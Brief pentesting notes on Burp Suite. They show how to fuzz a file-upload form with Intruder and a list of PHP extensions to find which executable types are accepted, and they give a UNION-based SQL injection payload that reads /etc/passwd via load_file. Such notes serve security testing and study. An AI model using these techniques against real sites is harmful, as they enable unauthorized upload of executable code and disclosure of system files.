#
Burpsuite
#Burpsuite
#
fuzz upload forms
- Make a wordlist:
cat > extensions.txt
.php
.phtml
.php3
.php4
.php5
^D- Use sniper Make sure BurpSuite is configured to intercept all your browser traffic. Upload a file and send request to Intruder. Click on "Payloads" and select the "Sniper" attack type.
Click the "Positions" tab now, find the filename and "Add §" to the extension. should like like this:
Content-Disposition: form-data; name="file"; filename="gnnr§.php§"
Content-Type: application/x-php- Run Attack load your wordlist and run the attack. This will tell you what extensions are allowed in the form.
#
SQL injection in repeater
uname='+union+select+1,(load_file('/etc/passwd')),3,4,5,6--+-&password=test